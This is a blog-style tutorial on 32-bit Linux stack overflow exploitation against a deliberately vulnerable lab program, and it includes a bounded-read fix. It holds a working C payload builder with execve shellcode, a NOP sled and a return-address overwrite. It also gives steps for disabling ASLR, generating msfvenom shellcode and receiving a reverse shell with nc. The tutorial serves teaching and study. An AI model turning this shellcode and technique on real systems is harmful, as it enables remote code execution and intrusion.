Linux binary exploitation

islam ahmed
Dec 20, 2020

This is the vulnerable program:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* read() */

int helper() {
    /* Never called by the program itself; the first goal is to reach it via the overflow. */
    system("touch pwnd.txt");
    return 0;
}

int overflow()
{
    char buffer[500];
    int userinput;
    /* Bug: reads up to 700 bytes into a 500-byte stack buffer, so bytes 501..700
     * overwrite whatever sits above buffer[] on the stack, including the saved
     * return address. */
    userinput = read(0, buffer, 700);
    printf("\nUser provided %d bytes. Buffer content is: %s\n", userinput, buffer);
    return 0;
}

int main (int argc, char * argv[])
{
    overflow();
    return 0;
}

You can compile it with gcc. The addresses used in this walkthrough (EIP, a fixed code address such as 0x004011b9 and a stack address such as 0xbffff330) assume a 32-bit, non-PIE build with the stack protector and NX disabled, i.e. gcc's -m32, -no-pie, -fno-stack-protector and -z execstack; a default build on a modern distribution enables those protections and the same steps will not work unchanged.

The first thing to do is check which protections the binary was built with, for example with PEDA's checksec command.

No protections are enabled: no stack canary, no NX (the stack is executable) and no PIE (code addresses are fixed).
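As an added example (not code from the original post), here is the same function with the read bounded by the buffer it fills, so you can see exactly which line is the bug and what the fix looks like. The overflow() above passes a literal 700 to read() for a 500-byte array; the fixed version derives the limit from sizeof the buffer and always NUL-terminates, which the original also needs because printf("%s") runs off the end of an unterminated buffer. The helper read_bounded() is my own name, not something from the post.

```c
/* Added example (not from the original post): overflow() with a bounded read. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 500

/* Read at most cap-1 bytes from fd into buf and always NUL-terminate it.
 * Returns the number of bytes stored, or -1 on error (or if cap == 0). */
ssize_t read_bounded(int fd, char *buf, size_t cap)
{
    if (cap == 0)
        return -1;
    /* The bound comes from the destination buffer, not from a literal that
     * can drift out of sync with the array size (700 vs 500 in the original). */
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    buf[n] = '\0';   /* printf("%s") below needs a terminator */
    return n;
}

/* Hardened overflow(): user input can never write past buffer[]. */
int overflow_fixed(void)
{
    char buffer[BUF_SIZE];
    ssize_t userinput = read_bounded(0, buffer, sizeof buffer);
    printf("\nUser provided %zd bytes. Buffer content is: %s\n", userinput, buffer);
    return 0;
}

int main(void)
{
    return overflow_fixed();
}
```

Feeding this build 700 bytes stores the first 499 and drops the rest; the remaining bytes stay in the pipe and never touch the saved EBP or return address.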

Let’s run it in gdb-peda

We can list the program's functions with the info functions command.

Our first task is to make the program call helper(), which runs system("touch pwnd.txt"), so we need helper's address. Before that, disable ASLR with this command:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

With ASLR on, the stack and library addresses change every time you run the program (helper's address in this non-PIE binary stays fixed, but the stack address we need for the shellcode stage does not). I will explain later how to bypass it.

x86 is little-endian, so an address is written into the payload with its bytes reversed:

0x004011b9 becomes \xb9\x11\x40\x00

Now we need to control EIP so that it executes our helper function. PEDA's pattern create generates a cyclic pattern; after the crash, pattern offset on the value found in EIP tells us at which offset in our input the saved return address is overwritten.

The offset is 516: the first 516 bytes fill buffer[] and the saved EBP, and the next 4 bytes land in EIP. Let's point them at helper.

It works (pwnd.txt is created). Now let's run shellcode instead of calling helper.

We can generate shellcode with msfvenom, but it must not contain bad characters, bytes such as \x00 that the program or the delivery path would truncate or mangle and so break the shellcode. msfvenom's -b option excludes the bytes you list and encodes around them.

Now we need a value for EIP that points into our own input on the stack. ESP is the stack pointer; when overflow() returns, the 4 bytes at ESP are popped into EIP, so right after the ret ESP points to the bytes immediately following our overwritten return address. That is where we place the shellcode.

From the stack dump our A's start 8 bytes past 0xbffff330, so 0xbffff338 is the start of our input; adding the offset to it gives an address inside our payload that we can put into EIP.

We prepend a NOP sled (\x90, no operation) to the shellcode. The return address then only has to land somewhere inside the sled rather than on the exact first byte of the shellcode, which makes the exploit tolerant of small errors in the stack address.
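The payload layout described in the last few steps (padding to the EIP offset, little-endian return address, NOP sled, shellcode) and the earlier ret-to-helper payload, as an added example that is not code from the original post. It writes the raw bytes to stdout so it can be piped into the target, e.g. ./mkpayload helper | ./vuln or ./mkpayload shell | ./vuln. The numbers are the ones quoted in the post (516 bytes to EIP, helper at 0x004011b9, input starting at 0xbffff338) and are assumptions for your own build: re-measure them with pattern offset and the stack dump. The shellcode array is the classic 23-byte execve("/bin//sh") stub for 32-bit Linux, used as a stand-in for the msfvenom reverse shell; paste msfvenom's -f c output there instead. Function names (le32, build_ret2func, build_shellcode_payload, sled_target, find_bad_byte) are mine.

```c
/* Added example (not from the original post): build the two payloads. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define READ_LIMIT   700u        /* read(0, buffer, 700): nothing past this is copied */
#define EIP_OFFSET   516u        /* assumed: bytes before the saved return address */
#define HELPER_ADDR  0x004011b9u /* assumed: address of helper() (non-PIE, no ASLR) */
#define INPUT_ADDR   0xbffff338u /* assumed: where our input starts on the stack */
#define NOP_SLED     100u        /* sled + shellcode must fit in READ_LIMIT - EIP_OFFSET - 4 */

/* Classic execve("/bin//sh") stub, 23 bytes, contains no \x00 or \x0a. */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof shellcode - 1)   /* drop the literal's trailing NUL */

/* Write a 32-bit value little-endian: 0x004011b9 -> b9 11 40 00. */
void le32(uint32_t v, unsigned char out[4])
{
    out[0] = v & 0xff;
    out[1] = (v >> 8) & 0xff;
    out[2] = (v >> 16) & 0xff;
    out[3] = (v >> 24) & 0xff;
}

/* Stage 1: 'A' padding up to EIP, then the address of helper().
 * Returns the payload length, or 0 if it does not fit in cap bytes. */
size_t build_ret2func(unsigned char *out, size_t cap, size_t offset, uint32_t target)
{
    if (cap < offset + 4)
        return 0;
    memset(out, 'A', offset);
    le32(target, out + offset);
    return offset + 4;
}

/* Address to put in EIP: the middle of the sled, which starts right after the
 * overwritten return address (where ESP points once overflow() has returned). */
uint32_t sled_target(uint32_t input_addr, size_t offset, size_t sled)
{
    return input_addr + (uint32_t)(offset + 4 + sled / 2);
}

/* Stage 2: padding, return address into the sled, NOP sled, shellcode.
 * Returns the payload length, or 0 if it would exceed cap (the read() limit). */
size_t build_shellcode_payload(unsigned char *out, size_t cap, size_t offset,
                               uint32_t ret_addr, size_t sled,
                               const unsigned char *sc, size_t sc_len)
{
    size_t total = offset + 4 + sled + sc_len;
    if (cap < total)
        return 0;
    memset(out, 'A', offset);
    le32(ret_addr, out + offset);
    memset(out + offset + 4, 0x90, sled);        /* NOP sled */
    memcpy(out + offset + 4 + sled, sc, sc_len);
    return total;
}

/* Bad-character check (the list you would pass to msfvenom -b).
 * Returns the index of the first offending byte, or -1 if none. */
long find_bad_byte(const unsigned char *p, size_t len, const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (p[i] == bad[j])
                return (long)i;
    return -1;
}

int main(int argc, char **argv)
{
    unsigned char payload[READ_LIMIT];
    size_t len;
    if (argc > 1 && strcmp(argv[1], "shell") == 0)
        len = build_shellcode_payload(payload, sizeof payload, EIP_OFFSET,
                                      sled_target(INPUT_ADDR, EIP_OFFSET, NOP_SLED),
                                      NOP_SLED, shellcode, SHELLCODE_LEN);
    else
        len = build_ret2func(payload, sizeof payload, EIP_OFFSET, HELPER_ADDR);
    if (len == 0) {
        fprintf(stderr, "payload does not fit in the %u bytes read() accepts\n", READ_LIMIT);
        return 1;
    }
    fwrite(payload, 1, len, stdout);
    return 0;
}
```

Note the budget: read() copies at most 700 bytes, and 520 of them are spent before the sled starts, so sled plus shellcode cannot exceed 180 bytes; an encoded msfvenom reverse shell is larger than the stub above, so shorten the sled accordingly. The helper address ends in \x00, which is harmless here because it is the last byte of the stage-1 payload.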

Let's run it and then check the stack.

It works. Start nc listening on the attacker machine on the port you gave msfvenom, and you will receive the reverse shell.
